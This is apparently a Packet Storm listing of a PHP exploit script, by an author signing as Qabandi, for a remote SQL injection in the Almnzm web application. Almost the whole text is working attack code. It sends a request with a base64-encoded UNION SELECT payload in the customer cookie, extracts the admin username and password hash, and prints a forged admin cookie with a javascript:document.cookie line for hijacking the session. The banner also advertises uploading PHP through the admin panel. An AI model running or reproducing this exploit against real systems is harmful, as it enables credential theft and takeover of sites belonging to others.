Almnzm suffers from a remote SQL injection vulnerability.
eed9ac15ca35b976ce95908d0004b47a78063ddc578e5e115c77547b8a2c6fde<?
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
---Script Almnzm SQL INJECTION __/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
---"Powered by Almnzm" /QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
---admin cookie create |QQQQ/ By Qabandi \QQQQ|
---Add PhP Ext |QQQQ| |QQQQ|
---Upload php in adminCP |QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
\QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
');
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/
-----------------------------------------------------------------------------
');
die;
}
$host = $argv[1];
$p = "http://".$host.$argv[2];
function QAB_GET($qabandi, $from){
$content = $from;
preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/",
$content,
$out, PREG_PATTERN_ORDER);
return $out[1][0];
}
$packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";\r\n";
$packet.="Connection: Close\r\n\r\n";
$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}
echo "\n\n---Qabandi Is Here-------------------------------------------\n\n";
$Q_ver = QAB_GET("version", $data);
$Q_usr = QAB_GET("user", $data);
$Q_pwd = QAB_GET("pass", $data);
echo "[q]version:\n".$Q_ver."\n\n";
echo "[q]Admin User:\n".$Q_usr."\n\n";
echo "[q]Admin Hash:\n".$Q_pwd."\n\n";
$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);
echo "\n---Admin Cookie:\n";
echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n";
echo "\n\n---Qabandi Was Here------------------------------------------\n\n";
die;
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed